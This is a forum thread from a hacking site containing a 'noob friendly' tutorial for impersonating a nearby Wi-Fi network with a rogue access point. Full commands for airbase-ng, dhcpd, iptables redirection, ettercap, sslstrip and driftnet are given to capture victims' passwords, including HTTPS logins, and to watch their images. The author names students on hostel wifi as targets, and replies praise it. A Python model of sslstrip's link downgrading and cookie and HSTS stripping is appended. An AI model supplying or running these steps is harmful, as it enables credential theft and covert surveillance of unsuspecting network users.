ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) (/Thread-ADVANCED-PASSWORD-SNIFFING-NOOB-FRIENDLY-rogue-ap-ettercap-ssl-strip-driftnet-no-additional-router-required)
ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - papamoney - 06-22-2011

Hello friends. This is my first tutorial on advanced password sniffing. This tutorial is based on creating a rogue AP (access point).

NOTE: THIS IS NOT ORDINARY AP SNIFFING. YOU CAN SNIFF HTTPS PASSWORDS AND ALL KINDS OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.

SO ...

1) THINGS YOU NEED
a) The ESSID of any network surrounding you. Make sure many users connect to it.
b) Operating system: BT4, Ubuntu and other Linux distributions.
c) Two working network interfaces, a wireless one and an Ethernet connection (with internet would be great).

2) TOOLS REQUIRED
Aircrack-ng
SSLstrip
Ettercap/Ettercap-GTK and Ettercap-Common
Driftnet; this is not necessary but would be great if it works properly.

3) NOW INSTALLING THESE
Open a terminal window:
sudo apt-get install aircrack-ng
sudo apt-get install driftnet
sudo apt-get install ettercap
or sudo apt-get install ettercap-gtk (GUI)

For SSLstrip, do the following in the terminal:
cd Documents
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
sudo python ./setup.py install

That's it, you are done with the installation. Now it is time to configure your dhcpd.conf file. Basically this file contains the nameserver and you need to configure it to create a new nameserver.
NOW OPEN GEDIT AND PASTE THIS
Quote:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
  option subnet-mask 255.255.255.128;
  option broadcast-address 192.168.2.255;
  option routers 192.168.2.129;
  option domain-name-servers [ADD YOUR DNS HERE, REMOVE BRACKETS];
  range 192.168.2.130 192.168.2.140;
}
*** ADD YOUR DNS IN THE BRACKETS, DON'T FORGET IT ***
Save this as dhcpd.conf on the desktop.

Now time to sniff :thumbs:

In the terminal, enter root mode by typing:
sudo su

Now run:
airmon-ng start wlan0
and see the result. Note on which interface monitor mode is enabled; generally it is mon0.

To give our AP a name we use airbase-ng [part of the aircrack-ng suite]. We will be making an unsecured AP called 'VOLSBB'. mon0 is my ALFA in monitor mode and can be substituted for whatever device name you want, but it must be a device that supports packet injection, in monitor mode!
airbase-ng -e VOLSBB mon0

So we have an ESSID; let's add the netmask and gateway. [at0 is a replicated Ethernet device; maybe yours is eth0]:
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

We need to make sure that connections to the network are assigned IP addresses, so we point the dhcpd3 server to our new config file.
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
You may get an error saying that dhcpd is not a valid user; go to 'Users and Groups' on your start menu and add a user group called 'dhcpd', then try again.
echo > '/var/lib/dhcp3/dhcpd.leases'
[Change /home/Semtex-Primed/Documents/ to the path of your file.]
dhcpd3 -d -f -cf /home/Semtex-Primed/Documents/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

Now, to make sure that the people connecting have internet while on the network, we need to make sure that the server is routed properly when running. They need to be online on our network, otherwise we are not sniffing any passwords!
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

For the part below you need to make sure you have your 2nd interface [the non-sniffing one] connected to the net, and swap 'wlan1' for it below.
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

The next command needs changing: make sure 192.168.1.254 is changed to the default gateway of the network you are using!
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Sniffing!

Now we have a perfectly usable software AP that can connect to the internet. This is a long process to go through, but the rewards are huge. We have successfully set the AP up and now just need a way of monitoring it using Ettercap. We will be using Driftnet and SSLstrip too.

Set up IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward

I will assume you have or know how to set up Ettercap. The command below will start it monitoring the at0 interface. -T means text interface within the terminal, -q means quiet mode, -p makes sure it is not in promiscuous mode and -i tells ettercap which interface to monitor.
ettercap -T -q -p -i at0 // //

Next we will set up SSLstrip, which means if the 'victim' logs into an SSL login page then we will still get the passwords. Examples include PayPal, YouTube, Facebook, etc.
Open a new terminal and type:
sslstrip -a -k -f

Now the cool stuff, Driftnet. This tool will display pictures/video stills of what the person is looking at online! Great little tool!
Open up a 3rd 'sniffing terminal' and type:
driftnet -v -i at0
-v = verbose mode
-i = interface to monitor on.

Congrats!!!
You are done. All you need is another person connecting to your AP!!!!! :thumbs:
FEEL FREE TO ASK ANYTHING RELATED TO THIS

RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - deathknight - 06-22-2011

Very nice and detailed tutorial. I liked it :thumbs:. But.....

(06-22-2011, 08:58 AM)papamoney Wrote: NOTE: THIS IS NOT ORDINARY AP SNIFFING. YOU CAN SNIFF HTTPS PASSWORDS AND ALL KINDS OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.

To be honest, this line seems to give the false idea that we can't sniff HTTPS using normal/ordinary AP sniffing. You can easily sniff all the data, HTTPS and everything, just by connecting to an AP and using ettercap with sslstrip. But wouldn't it be easier and simpler just to use your own normal AP, making it unsecured and naming it "something free wifi etc", and connect to that AP and start sniffing with ettercap with sslstrip? .... An easier and shorter way.

RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap ettercap ssl strip driftnet(no additional router required) - papamoney - 06-22-2011

(06-22-2011, 02:10 PM)deathknight Wrote: Very nice and detailed tutorial. I liked it :thumbs:.
But.....

Yeah, it would be easier, but I also kept in mind the students who use hostel wifi, and believe me, the students do not connect to unknown wifi. So this tutorial is mainly for those who have just hostel wifi etc. and no other ESSID. Anyway, I made it for understanding purposes; there are many ways. I just favour this :p

RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - J2ack - 06-22-2011

Awesome, I liked it dude

RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - papamoney - 06-22-2011

(06-22-2011, 07:34 PM)J2ack Wrote: Awesome, I liked it dude

Thanks

RE: ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required) - WoosTy - 06-22-2011

Thanks man, nice post
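Added example, not code from this thread or from the sslstrip project: a minimal Python model of what the SSLstrip step in papamoney's tutorial does with the port-80 traffic that the `REDIRECT --to-ports 10000` rule hands it (rewrite https:// links to http://, remember which ones were rewritten so the upstream request can be re-upgraded, strip the Secure flag from cookies and drop the HSTS header), together with the one check that decides whether a victim's request ever reaches the proxy in the first place. The host names, headers and HTML body are constructed for the example, and the browser's HSTS store is modelled as a plain set of exact host names, which is an assumption.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Port the tutorial's "REDIRECT --to-ports 10000" rule hands client port-80 traffic to.
SSLSTRIP_PORT = 10000

# Absolute https:// URL: host, then an optional path with no whitespace, quotes or angle brackets.
HTTPS_URL = re.compile(r"https://([A-Za-z0-9.-]+)(/[^\s\"'<>]*)?")


@dataclass
class StripState:
    """Bookkeeping the proxy keeps so it can undo its own rewriting on the next request."""
    stripped: set = field(default_factory=set)          # (host, path) pairs handed to the client as http://
    secure_cookies: dict = field(default_factory=dict)  # host -> names of cookies that carried Secure

    def strip_response(self, host, headers, body):
        """Rewrite one response fetched from the real server over HTTPS before relaying it
        to the client over plaintext. Returns (new_headers, new_body)."""
        def downgrade(match):
            h = match.group(1)
            self.stripped.add((h, match.group(2) or "/"))
            return "http://" + h + (match.group(2) or "")

        new_body = HTTPS_URL.sub(downgrade, body)
        new_headers = []
        for name, value in headers:
            lname = name.lower()
            if lname == "location":
                value = HTTPS_URL.sub(downgrade, value)   # redirects to https:// are downgraded too
            elif lname == "set-cookie":
                parts = [p.strip() for p in value.split(";")]
                if any(p.lower() == "secure" for p in parts):
                    self.secure_cookies.setdefault(host, set()).add(parts[0].split("=", 1)[0])
                    parts = [p for p in parts if p.lower() != "secure"]  # browser would withhold it on http://
                value = "; ".join(parts)
            elif lname == "strict-transport-security":
                continue   # a client that never sees this header never learns to refuse plaintext
            new_headers.append((name, value))
        return new_headers, new_body

    def upstream_url(self, host, path):
        """URL to fetch from the real server for a request the client sent over plaintext:
        links we downgraded go back up to https://, everything else stays as the client asked."""
        scheme = "https" if (host, path) in self.stripped else "http"
        return "%s://%s%s" % (scheme, host, path)


def client_reaches_proxy(url, hsts_hosts):
    """True if a browser would emit this request over HTTP at all, i.e. through the port-80
    REDIRECT. hsts_hosts models the browser's HSTS store as a set of exact host names
    (an assumption of this example): such hosts are upgraded to https:// before any
    packet leaves the machine, so the proxy never gets a strippable request for them."""
    parts = urlsplit(url)
    return parts.scheme == "http" and (parts.hostname or "") not in hsts_hosts


# Constructed sample: what a login server would have returned to the proxy over HTTPS.
SAMPLE_HOST = "login.example.test"
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
    ("Strict-Transport-Security", "max-age=31536000"),
]
SAMPLE_BODY = (
    '<form action="https://login.example.test/auth" method="post">'
    '<a href="https://login.example.test/help">help</a>'
    '<img src="http://static.example.test/logo.png"></form>'
)


def demo():
    """Run the sample through the proxy; returns what the client sees plus the proxy state."""
    state = StripState()
    headers, body = state.strip_response(SAMPLE_HOST, SAMPLE_HEADERS, SAMPLE_BODY)
    return {"state": state, "headers": headers, "body": body}


if __name__ == "__main__":
    result = demo()
    print(result["body"])
    for name, value in result["headers"]:
        print("%s: %s" % (name, value))
    print(result["state"].upstream_url("login.example.test", "/auth"))
    print(client_reaches_proxy("http://login.example.test/auth", set()))
    print(client_reaches_proxy("http://login.example.test/auth", {"login.example.test"}))
```

The last function is the caveat a practitioner needs alongside the tutorial: the proxy only ever sees requests the browser was willing to send as http://, so a login host the browser already holds in its HSTS store (or ships preloaded) is upgraded to HTTPS before any packet leaves the victim's machine, the REDIRECT rule never matches, and there is nothing to rewrite; what the strip catches is the first plaintext hop to a site the client reaches over http://.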